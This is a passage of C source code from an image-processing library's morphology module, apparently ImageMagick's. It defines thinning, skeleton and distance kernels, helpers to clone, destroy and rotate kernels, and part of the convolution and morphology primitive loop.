LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("3x4+1+2:0,-,- 1,1,1 1,1,1 -,-,0");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("3x4+1+1:-,-,0 1,1,1 1,1,1 0,-,-");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("3x4+1+2:-,-,0 1,1,1 1,1,1 0,-,-");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
break;
}
break;
}
case ConvexHullKernel:
{
KernelInfo
*new_kernel;
/* first set of 8 kernels */
kernel=ParseKernelArray("3: 1,1,- 1,0,- 1,-,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandRotateKernelInfo(kernel, 90.0);
/* append the mirror versions too - no flip function yet */
new_kernel=ParseKernelArray("3: 1,1,1 1,0,- -,-,0");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
ExpandRotateKernelInfo(new_kernel, 90.0);
LastKernelInfo(kernel)->next = new_kernel;
break;
}
case SkeletonKernel:
{
switch ( (int) args->rho ) {
case 1:
default:
/* Traditional Skeleton...
** A cyclically rotated single kernel
*/
kernel=AcquireKernelInfo("ThinSE:482");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandRotateKernelInfo(kernel, 45.0); /* 8 rotations */
break;
case 2:
/* HIPR Variation of the cyclic skeleton
** Corners of the traditional method made more forgiving,
** but they retain the same cyclic order.
*/
kernel=AcquireKernelInfo("ThinSE:482; ThinSE:87x90;");
if (kernel == (KernelInfo *) NULL)
return(kernel);
if (kernel->next == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
kernel->type = type;
kernel->next->type = type;
ExpandRotateKernelInfo(kernel, 90.0); /* 4 rotations of the 2 kernels */
break;
case 3:
/* Dan Bloomberg Skeleton, from his paper on 3x3 thinning SE's
** "Connectivity-Preserving Morphological Image Thransformations"
** by Dan S. Bloomberg, available on Leptonica, Selected Papers,
** http://www.leptonica.com/papers/conn.pdf
*/
kernel=AcquireKernelInfo(
"ThinSE:41; ThinSE:42; ThinSE:43");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->next->type = type;
kernel->next->next->type = type;
ExpandMirrorKernelInfo(kernel); /* 12 kernels total */
break;
}
break;
}
case ThinSEKernel:
{ /* Special kernels for general thinning, while preserving connections
** "Connectivity-Preserving Morphological Image Thransformations"
** by Dan S. Bloomberg, available on Leptonica, Selected Papers,
** http://www.leptonica.com/papers/conn.pdf
** And
** http://tpgit.github.com/Leptonica/ccthin_8c_source.html
**
** Note kernels do not specify the origin pixel, allowing them
** to be used for both thickening and thinning operations.
*/
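      /* Illustrative command-line usage (an assumed example, not taken
      ** from this source): something like
      **   convert shape.gif -morphology Thinning:-1 'ThinSE:482' thin.gif
      ** iterates a thinning with this general edge kernel until no more
      ** pixels change.
      */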
switch ( (int) args->rho ) {
/* SE for 4-connected thinning */
case 41: /* SE_4_1 */
kernel=ParseKernelArray("3: -,-,1 0,-,1 -,-,1");
break;
case 42: /* SE_4_2 */
kernel=ParseKernelArray("3: -,-,1 0,-,1 -,0,-");
break;
case 43: /* SE_4_3 */
kernel=ParseKernelArray("3: -,0,- 0,-,1 -,-,1");
break;
case 44: /* SE_4_4 */
kernel=ParseKernelArray("3: -,0,- 0,-,1 -,0,-");
break;
case 45: /* SE_4_5 */
kernel=ParseKernelArray("3: -,0,1 0,-,1 -,0,-");
break;
case 46: /* SE_4_6 */
kernel=ParseKernelArray("3: -,0,- 0,-,1 -,0,1");
break;
case 47: /* SE_4_7 */
kernel=ParseKernelArray("3: -,1,1 0,-,1 -,0,-");
break;
case 48: /* SE_4_8 */
kernel=ParseKernelArray("3: -,-,1 0,-,1 0,-,1");
break;
case 49: /* SE_4_9 */
kernel=ParseKernelArray("3: 0,-,1 0,-,1 -,-,1");
break;
/* SE for 8-connected thinning - negatives of the above */
        case 81: /* SE_8_1 */
kernel=ParseKernelArray("3: -,1,- 0,-,1 -,1,-");
break;
case 82: /* SE_8_2 */
kernel=ParseKernelArray("3: -,1,- 0,-,1 0,-,-");
break;
case 83: /* SE_8_3 */
kernel=ParseKernelArray("3: 0,-,- 0,-,1 -,1,-");
break;
case 84: /* SE_8_4 */
kernel=ParseKernelArray("3: 0,-,- 0,-,1 0,-,-");
break;
case 85: /* SE_8_5 */
kernel=ParseKernelArray("3: 0,-,1 0,-,1 0,-,-");
break;
case 86: /* SE_8_6 */
kernel=ParseKernelArray("3: 0,-,- 0,-,1 0,-,1");
break;
case 87: /* SE_8_7 */
kernel=ParseKernelArray("3: -,1,- 0,-,1 0,0,-");
break;
case 88: /* SE_8_8 */
kernel=ParseKernelArray("3: -,1,- 0,-,1 0,1,-");
break;
case 89: /* SE_8_9 */
kernel=ParseKernelArray("3: 0,1,- 0,-,1 -,1,-");
break;
/* Special combined SE kernels */
case 423: /* SE_4_2 , SE_4_3 Combined Kernel */
kernel=ParseKernelArray("3: -,-,1 0,-,- -,0,-");
break;
case 823: /* SE_8_2 , SE_8_3 Combined Kernel */
kernel=ParseKernelArray("3: -,1,- -,-,1 0,-,-");
break;
case 481: /* SE_48_1 - General Connected Corner Kernel */
kernel=ParseKernelArray("3: -,1,1 0,-,1 0,0,-");
break;
default:
case 482: /* SE_48_2 - General Edge Kernel */
kernel=ParseKernelArray("3: 0,-,1 0,-,1 0,-,1");
break;
}
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->sigma);
break;
}
/*
Distance Measuring Kernels
*/
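    /* For a pixel at offset (u,v) from the kernel origin, the value stored
    ** by the cases below is args->sigma times the corresponding metric:
    **   Chebyshev:  max(|u|,|v|)
    **   Manhattan:  |u|+|v|
    **   Octagonal:  max( max(|u|,|v|), floor((|u|+|v|+1)/1.5) )
    **   Euclidean:  sqrt(u*u+v*v)
    */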
case ChebyshevKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 3; /* default radius = 1 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->positive_range += ( kernel->values[i] =
args->sigma*MagickMax(fabs((double)u),fabs((double)v)) );
kernel->maximum = kernel->values[0];
break;
}
case ManhattanKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 3; /* default radius = 1 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->positive_range += ( kernel->values[i] =
args->sigma*(labs((long) u)+labs((long) v)) );
kernel->maximum = kernel->values[0];
break;
}
case OctagonalKernel:
{
if (args->rho < 2.0)
kernel->width = kernel->height = 5; /* default/minimum radius = 2 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
{
double
r1 = MagickMax(fabs((double)u),fabs((double)v)),
r2 = floor((double)(labs((long)u)+labs((long)v)+1)/1.5);
kernel->positive_range += kernel->values[i] =
args->sigma*MagickMax(r1,r2);
}
kernel->maximum = kernel->values[0];
break;
}
case EuclideanKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 3; /* default radius = 1 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->positive_range += ( kernel->values[i] =
args->sigma*sqrt((double)(u*u+v*v)) );
kernel->maximum = kernel->values[0];
break;
}
default:
{
/* No-Op Kernel - Basically just a single pixel on its own */
kernel=ParseKernelArray("1:1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = UndefinedKernel;
break;
}
break;
}
return(kernel);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% C l o n e K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
%  CloneKernelInfo() creates a new clone of the given kernel list so that it
%  can be modified without affecting the original.  The cloned kernel should
%  be destroyed using DestroyKernelInfo() when no longer needed.
%
% The format of the CloneKernelInfo method is:
%
% KernelInfo *CloneKernelInfo(const KernelInfo *kernel)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel to be cloned
%
*/
MagickExport KernelInfo *CloneKernelInfo(const KernelInfo *kernel)
{
register ssize_t
i;
KernelInfo
*new_kernel;
assert(kernel != (KernelInfo *) NULL);
new_kernel=(KernelInfo *) AcquireMagickMemory(sizeof(*kernel));
if (new_kernel == (KernelInfo *) NULL)
return(new_kernel);
*new_kernel=(*kernel); /* copy values in structure */
/* replace the values with a copy of the values */
new_kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (new_kernel->values == (double *) NULL)
return(DestroyKernelInfo(new_kernel));
for (i=0; i < (ssize_t) (kernel->width*kernel->height); i++)
new_kernel->values[i]=kernel->values[i];
/* Also clone the next kernel in the kernel list */
if ( kernel->next != (KernelInfo *) NULL ) {
new_kernel->next = CloneKernelInfo(kernel->next);
if ( new_kernel->next == (KernelInfo *) NULL )
return(DestroyKernelInfo(new_kernel));
}
return(new_kernel);
}
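/* Illustrative sketch (not compiled): clone a built-in kernel list, modify
** the copy, and release both lists independently.  The kernel string is an
** arbitrary example.
*/
#if 0
{
  KernelInfo
    *copy,
    *kernel;

  kernel=AcquireKernelInfo("Octagon:3");
  if (kernel != (KernelInfo *) NULL)
    {
      copy=CloneKernelInfo(kernel);
      if (copy != (KernelInfo *) NULL)
        {
          copy->values[0]=0.0;        /* the original kernel is untouched */
          copy=DestroyKernelInfo(copy);
        }
      kernel=DestroyKernelInfo(kernel);
    }
}
#endif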
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% D e s t r o y K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% DestroyKernelInfo() frees the memory used by a Convolution/Morphology
% kernel.
%
% The format of the DestroyKernelInfo method is:
%
% KernelInfo *DestroyKernelInfo(KernelInfo *kernel)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel to be destroyed
%
*/
MagickExport KernelInfo *DestroyKernelInfo(KernelInfo *kernel)
{
assert(kernel != (KernelInfo *) NULL);
if ( kernel->next != (KernelInfo *) NULL )
kernel->next = DestroyKernelInfo(kernel->next);
kernel->values = (double *)RelinquishMagickMemory(kernel->values);
kernel = (KernelInfo *) RelinquishMagickMemory(kernel);
return(kernel);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
+ E x p a n d M i r r o r K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
%  ExpandMirrorKernelInfo() takes a single kernel and expands it into a
%  sequence of 90-degree rotated kernels, but provides a reflected 180-degree
%  rotation before the -/+ 90-degree rotations.
%
%  This special rotation order produces a better, more symmetrical thinning of
%  objects.
%
% The format of the ExpandMirrorKernelInfo method is:
%
% void ExpandMirrorKernelInfo(KernelInfo *kernel)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
%  This function is internal to this module only, as it is not finalized,
% especially with regard to non-orthogonal angles, and rotation of larger
% 2D kernels.
*/
#if 0
static void FlopKernelInfo(KernelInfo *kernel)
{ /* Do a Flop by reversing each row. */
size_t
y;
register ssize_t
x,r;
register double
*k,t;
for ( y=0, k=kernel->values; y < kernel->height; y++, k+=kernel->width)
for ( x=0, r=kernel->width-1; x<kernel->width/2; x++, r--)
t=k[x], k[x]=k[r], k[r]=t;
kernel->x = kernel->width - kernel->x - 1;
  kernel->angle = fmod(kernel->angle+180.0, 360.0);
}
#endif
static void ExpandMirrorKernelInfo(KernelInfo *kernel)
{
KernelInfo
*clone,
*last;
last = kernel;
clone = CloneKernelInfo(last);
RotateKernelInfo(clone, 180); /* flip */
LastKernelInfo(last)->next = clone;
last = clone;
clone = CloneKernelInfo(last);
RotateKernelInfo(clone, 90); /* transpose */
LastKernelInfo(last)->next = clone;
last = clone;
clone = CloneKernelInfo(last);
RotateKernelInfo(clone, 180); /* flop */
LastKernelInfo(last)->next = clone;
return;
}
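/* Illustrative sketch (not compiled): expanding one 3x3 kernel into its
** four mirrored orientations and counting the resulting list.  The kernel
** string is an arbitrary example.
*/
#if 0
{
  KernelInfo
    *kernel,
    *p;
  size_t
    count;

  kernel=ParseKernelArray("3: -,-,1 0,-,1 -,0,-");
  if (kernel != (KernelInfo *) NULL)
    {
      ExpandMirrorKernelInfo(kernel);  /* original, flip, transpose, flop */
      for (count=0, p=kernel; p != (KernelInfo *) NULL; p=p->next)
        count++;                       /* count is now 4 */
      kernel=DestroyKernelInfo(kernel);
    }
}
#endif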
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
+ E x p a n d R o t a t e K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ExpandRotateKernelInfo() takes a kernel list, and expands it by rotating
% incrementally by the angle given, until the kernel repeats.
%
%  WARNING: 45-degree rotations only work for 3x3 kernels, while 90-degree
%  rotations only work for linear and square kernels.
%
% The format of the ExpandRotateKernelInfo method is:
%
% void ExpandRotateKernelInfo(KernelInfo *kernel, double angle)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
% o angle: angle to rotate in degrees
%
%  This function is internal to this module only, as it is not finalized,
% especially with regard to non-orthogonal angles, and rotation of larger
% 2D kernels.
*/
/* Internal Routine - Return true if two kernels are the same */
static MagickBooleanType SameKernelInfo(const KernelInfo *kernel1,
const KernelInfo *kernel2)
{
register size_t
i;
/* check size and origin location */
if ( kernel1->width != kernel2->width
|| kernel1->height != kernel2->height
|| kernel1->x != kernel2->x
|| kernel1->y != kernel2->y )
return MagickFalse;
/* check actual kernel values */
for (i=0; i < (kernel1->width*kernel1->height); i++) {
    /* Test for NaN equivalence */
if ( IsNan(kernel1->values[i]) && !IsNan(kernel2->values[i]) )
return MagickFalse;
if ( IsNan(kernel2->values[i]) && !IsNan(kernel1->values[i]) )
return MagickFalse;
    /* Test actual values are equivalent */
if ( fabs(kernel1->values[i] - kernel2->values[i]) > MagickEpsilon )
return MagickFalse;
}
return MagickTrue;
}
static void ExpandRotateKernelInfo(KernelInfo *kernel, const double angle)
{
KernelInfo
*clone,
*last;
last = kernel;
while(1) {
clone = CloneKernelInfo(last);
RotateKernelInfo(clone, angle);
if ( SameKernelInfo(kernel, clone) == MagickTrue )
break;
LastKernelInfo(last)->next = clone;
last = clone;
}
clone = DestroyKernelInfo(clone); /* kernel has repeated - junk the clone */
return;
}
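/* Illustrative sketch (not compiled): a 45-degree expansion of a single 3x3
** kernel, as used by the skeleton kernels above, yields a list of 8
** rotations before the kernel repeats.
*/
#if 0
{
  KernelInfo
    *kernel;

  kernel=ParseKernelArray("3: 0,-,1 0,-,1 0,-,1");   /* same as ThinSE:482 */
  if (kernel != (KernelInfo *) NULL)
    {
      ExpandRotateKernelInfo(kernel, 45.0);  /* list of 8 rotated kernels */
      kernel=DestroyKernelInfo(kernel);
    }
}
#endif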
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
+     C a l c K e r n e l M e t a D a t a                                     %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
%  CalcKernelMetaData() recalculates the KernelInfo meta-data of this kernel
%  only, using the kernel values.  This should only be used if it is not
%  possible to calculate that meta-data in some easier way.
%
% It is important that the meta-data is correct before ScaleKernelInfo() is
% used to perform kernel normalization.
%
% The format of the CalcKernelMetaData method is:
%
%      void CalcKernelMetaData(KernelInfo *kernel)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel to modify
%
% WARNING: Minimum and Maximum values are assumed to include zero, even if
% zero is not part of the kernel (as in Gaussian Derived kernels). This
% however is not true for flat-shaped morphological kernels.
%
% WARNING: Only the specific kernel pointed to is modified, not a list of
% multiple kernels.
%
% This is an internal function and not expected to be useful outside this
% module. This could change however.
*/
static void CalcKernelMetaData(KernelInfo *kernel)
{
register size_t
i;
kernel->minimum = kernel->maximum = 0.0;
kernel->negative_range = kernel->positive_range = 0.0;
for (i=0; i < (kernel->width*kernel->height); i++)
{
if ( fabs(kernel->values[i]) < MagickEpsilon )
kernel->values[i] = 0.0;
( kernel->values[i] < 0)
? ( kernel->negative_range += kernel->values[i] )
: ( kernel->positive_range += kernel->values[i] );
Minimize(kernel->minimum, kernel->values[i]);
Maximize(kernel->maximum, kernel->values[i]);
}
return;
}
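/* Illustrative sketch (not compiled): after editing kernel values by hand,
** recompute the meta-data before any normalization that depends on it.
** Assumes a 'kernel' is in scope; the edit shown is arbitrary.
*/
#if 0
{
  register size_t
    i;

  for (i=0; i < (kernel->width*kernel->height); i++)
    kernel->values[i] = -kernel->values[i];    /* arbitrary edit */
  CalcKernelMetaData(kernel);  /* ranges and min/max are now valid again */
}
#endif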
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% M o r p h o l o g y A p p l y %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% MorphologyApply() applies a morphological method, multiple times using
% a list of multiple kernels.
%
%  It is basically equivalent to MorphologyImageChannel() (see below) but
%  without any user controls.  This allows internal programs to use this
%  function to perform a specific task without possible interference
%  from any user-supplied API settings.
%
%  It is MorphologyImageChannel()'s task to extract any such user controls,
%  and pass them to this function for processing.
%
%  More specifically, kernels are not normalized/scaled/blended by the
%  'convolve:scale' Image Artifact (setting), nor is the convolve bias
%  (-bias setting or image->bias) looked at, but must be supplied from the
% function arguments.
%
% The format of the MorphologyApply method is:
%
%      Image *MorphologyApply(const Image *image, const ChannelType channel,
%        const MorphologyMethod method, const ssize_t iterations,
%        const KernelInfo *kernel, const CompositeOperator compose,
%        const double bias, ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the source image
%
% o method: the morphology method to be applied.
%
% o channel: the channels to which the operations are applied
% The channel 'sync' flag determines if 'alpha weighting' is
% applied for convolution style operations.
%
%    o iterations: apply the operation this many times, or until no change.
%                  A value of -1 means loop until no change is found.
%                  How this is applied may depend on the morphology method.
%                  Typically this is a value of 1.
%
% o kernel: An array of double representing the morphology kernel.
%
% o compose: How to handle or merge multi-kernel results.
% If 'UndefinedCompositeOp' use default for the Morphology method.
% If 'NoCompositeOp' force image to be re-iterated by each kernel.
% Otherwise merge the results using the compose method given.
%
% o bias: Convolution Output Bias.
%
% o exception: return any errors or warnings in this structure.
%
*/
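/* Illustrative sketch (not compiled): a typical internal call, applying one
** pass of a dilation with a kernel and default composition handling.  The
** kernel string and method are arbitrary examples; 'image' and 'exception'
** are assumed to be in scope.
*/
#if 0
{
  Image
    *morphed;
  KernelInfo
    *kernel;

  kernel=AcquireKernelInfo("Octagon:3");
  if (kernel != (KernelInfo *) NULL)
    {
      morphed=MorphologyApply(image,DefaultChannels,DilateMorphology,1,
        kernel,UndefinedCompositeOp,0.0,exception);
      kernel=DestroyKernelInfo(kernel);
      if (morphed != (Image *) NULL)
        morphed=DestroyImage(morphed);
    }
}
#endif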
/* Apply a Morphology Primitive to an image using the given kernel.
** Two pre-created images must be provided, and no image is created.
** It returns the number of pixels that changed between the images
** for result convergence determination, or -1 on error.
*/
static ssize_t MorphologyPrimitive(const Image *image, Image *result_image,
const MorphologyMethod method, const ChannelType channel,
const KernelInfo *kernel,const double bias,ExceptionInfo *exception)
{
#define MorphologyTag "Morphology/Image"
CacheView
*p_view,
*q_view;
ssize_t
y, offx, offy;
size_t
virt_width,
changed;
MagickBooleanType
status;
MagickOffsetType
progress;
assert(image != (Image *) NULL);
assert(image->signature == MagickSignature);
assert(result_image != (Image *) NULL);
assert(result_image->signature == MagickSignature);
assert(kernel != (KernelInfo *) NULL);
assert(kernel->signature == MagickSignature);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickSignature);
status=MagickTrue;
changed=0;
progress=0;
p_view=AcquireCacheView(image);
q_view=AcquireCacheView(result_image);
  virt_width=image->columns+kernel->width-1;
  /* Some methods (including convolve) need to use a reflected kernel.
   * Adjust 'origin' offsets to loop through the kernel as a reflection.
*/
offx = kernel->x;
offy = kernel->y;
switch(method) {
case ConvolveMorphology:
case DilateMorphology:
case DilateIntensityMorphology:
/*case DistanceMorphology:*/
      /* kernel needs to be used with reflection about origin */
offx = (ssize_t) kernel->width-offx-1;
offy = (ssize_t) kernel->height-offy-1;
break;
case ErodeMorphology:
case ErodeIntensityMorphology:
case HitAndMissMorphology:
case ThinningMorphology:
case ThickenMorphology:
/* kernel is used as is, without reflection */
break;
default:
      assert(0 && "Not a Primitive Morphology Method");
break;
}
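  /* Worked example: for a 4x3 kernel with origin (x,y)=(1,0), the reflected
  ** origin used above becomes (4-1-1, 3-0-1) = (2,2).
  */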
if ( method == ConvolveMorphology && kernel->width == 1 )
{ /* Special handling (for speed) of vertical (blur) kernels.
** This performs its handling in columns rather than in rows.
** This is only done for convolve as it is the only method that
** generates very large 1-D vertical kernels (such as a 'BlurKernel')
**
** Timing tests (on single CPU laptop)
    ** Using a vertical 1-d Blur with normal row-by-row (below)
** time convert logo: -morphology Convolve Blur:0x10+90 null:
** 0.807u
** Using this column method
** time convert logo: -morphology Convolve Blur:0x10+90 null:
** 0.620u
**
** Anthony Thyssen, 14 June 2010
*/
register ssize_t
x;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(dynamic,4) shared(progress,status)
#endif
for (x=0; x < (ssize_t) image->columns; x++)
{
register const PixelPacket
*restrict p;
register const IndexPacket
*restrict p_indexes;
register PixelPacket
*restrict q;
register IndexPacket
*restrict q_indexes;
register ssize_t
y;
ssize_t
r;
if (status == MagickFalse)
continue;
p=GetCacheViewVirtualPixels(p_view, x, -offy,1,
image->rows+kernel->height-1, exception);
q=GetCacheViewAuthenticPixels(q_view,x,0,1,result_image->rows,exception);
if ((p == (const PixelPacket *) NULL) || (q == (PixelPacket *) NULL))
{
status=MagickFalse;
continue;
}
p_indexes=GetCacheViewVirtualIndexQueue(p_view);
q_indexes=GetCacheViewAuthenticIndexQueue(q_view);
      /* offset to origin in 'p', while 'q' points to it directly */
r = offy;
for (y=0; y < (ssize_t) image->rows; y++)
{
register ssize_t
v;
register const double
*restrict k;
register const PixelPacket
*restrict k_pixels;
register const IndexPacket
*restrict k_indexes;
MagickPixelPacket
result;
/* Copy input image to the output image for unused channels
        * This removes the need for 'cloning' a new image every iteration
*/
*q = p[r];
if (image->colorspace == CMYKColorspace)
q_indexes[y] = p_indexes[r];
/* Set the bias of the weighted average output */
result.red =
result.green =
result.blue =
result.opacity =
result.index = bias;
/* Weighted Average of pixels using reflected kernel
**
        ** NOTE for correct working of this operation for asymmetrical
        ** kernels, the kernel needs to be applied in its reflected form.
        ** That is, its values need to be reversed.
*/
k = &kernel->values[ kernel->height-1 ];
k_pixels = p;
k_indexes = p_indexes;
if ( ((channel & SyncChannels) == 0 ) ||
(image->matte == MagickFalse) )
{ /* No 'Sync' involved.
** Convolution is simple greyscale channel operation
*/
            /* NOTE: the pointer increments live in the for() header so that
            ** NaN ('don't care') entries still advance the kernel and pixel
            ** pointers in step.
            */
            for (v=0; v < (ssize_t) kernel->height;
                                       v++, k--, k_pixels++, k_indexes++) {
              if ( IsNan(*k) ) continue;
              result.red     += (*k)*k_pixels->red;
              result.green   += (*k)*k_pixels->green;
              result.blue    += (*k)*k_pixels->blue;
              result.opacity += (*k)*k_pixels->opacity;
              if ( image->colorspace == CMYKColorspace)
                result.index += (*k)*(*k_indexes);
            }
if ((channel & RedChannel) != 0)
q->red = ClampToQuantum(result.red);
if ((channel & GreenChannel) != 0)
q->green = ClampToQuantum(result.green);
if ((channel & BlueChannel) != 0)
q->blue = ClampToQuantum(result.blue);
if ((channel & OpacityChannel) != 0
&& image->matte == MagickTrue )
q->opacity = ClampToQuantum(result.opacity);
if ((channel & IndexChannel) != 0
&& image->colorspace == CMYKColorspace)
              q_indexes[y] = ClampToQuantum(result.index);
}
else
{ /* Channel 'Sync' Flag, and Alpha Channel enabled.
** Weight the color channels with Alpha Channel so that
** transparent pixels are not part of the results.
*/
MagickRealType
alpha, /* alpha weighting of colors : kernel*alpha */
gamma; /* divisor, sum of color weighting values */
gamma=0.0;
            for (v=0; v < (ssize_t) kernel->height;
                                       v++, k--, k_pixels++, k_indexes++) {
              if ( IsNan(*k) ) continue;
              alpha=(*k)*(QuantumScale*(QuantumRange-k_pixels->opacity));
              gamma += alpha;
              result.red     += alpha*k_pixels->red;
              result.green   += alpha*k_pixels->green;
              result.blue    += alpha*k_pixels->blue;
              result.opacity += (*k)*k_pixels->opacity;
              if ( image->colorspace == CMYKColorspace)
                result.index += alpha*(*k_indexes);
            }
/* Sync'ed channels, all channels are modified */
gamma=1.0/(fabs((double) gamma) <= MagickEpsilon ? 1.0 : gamma);
q->red = ClampToQuantum(gamma*result.red);
q->green = ClampToQuantum(gamma*result.green);
q->blue = ClampToQuantum(gamma*result.blue);
q->opacity = ClampToQuantum(result.opacity);
if (image->colorspace == CMYKColorspace)
              q_indexes[y] = ClampToQuantum(gamma*result.index);
}
/* Count up changed pixels */
if ( ( p[r].red != q->red )
|| ( p[r].green != q->green )
|| ( p[r].blue != q->blue )
|| ( p[r].opacity != q->opacity )
|| ( image->colorspace == CMYKColorspace &&
                 p_indexes[r] != q_indexes[y] ) )
changed++; /* The pixel was changed in some way! */
p++;
q++;
} /* y */
if ( SyncCacheViewAuthenticPixels(q_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp critical (MagickCore_MorphologyImage)
#endif
          proceed=SetImageProgress(image,MorphologyTag,progress++,image->columns);
if (proceed == MagickFalse)
status=MagickFalse;
}
} /* x */
result_image->type=image->type;
q_view=DestroyCacheView(q_view);
p_view=DestroyCacheView(p_view);
      return(status ? (ssize_t) changed : -1);
}
/*
** Normal handling of horizontal or rectangular kernels (row by row)
*/
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(dynamic,4) shared(progress,status)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
register const PixelPacket
*restrict p;
register const IndexPacket
*restrict p_indexes;
register PixelPacket
*restrict q;
register IndexPacket
*restrict q_indexes;
register ssize_t
x;
size_t
r;
if (status == MagickFalse)
continue;
p=GetCacheViewVirtualPixels(p_view, -offx, y-offy, virt_width,
kernel->height, exception);
q=GetCacheViewAuthenticPixels(q_view,0,y,result_image->columns,1,
exception);
if ((p == (const PixelPacket *) NULL) || (q == (PixelPacket *) NULL))
{
status=MagickFalse;
continue;
}
p_indexes=GetCacheViewVirtualIndexQueue(p_view);
q_indexes=GetCacheViewAuthenticIndexQueue(q_view);
    /* offset to origin in 'p', while 'q' points to it directly */
r = virt_width*offy + offx;
for (x=0; x < (ssize_t) image->columns; x++)
{
ssize_t
v;
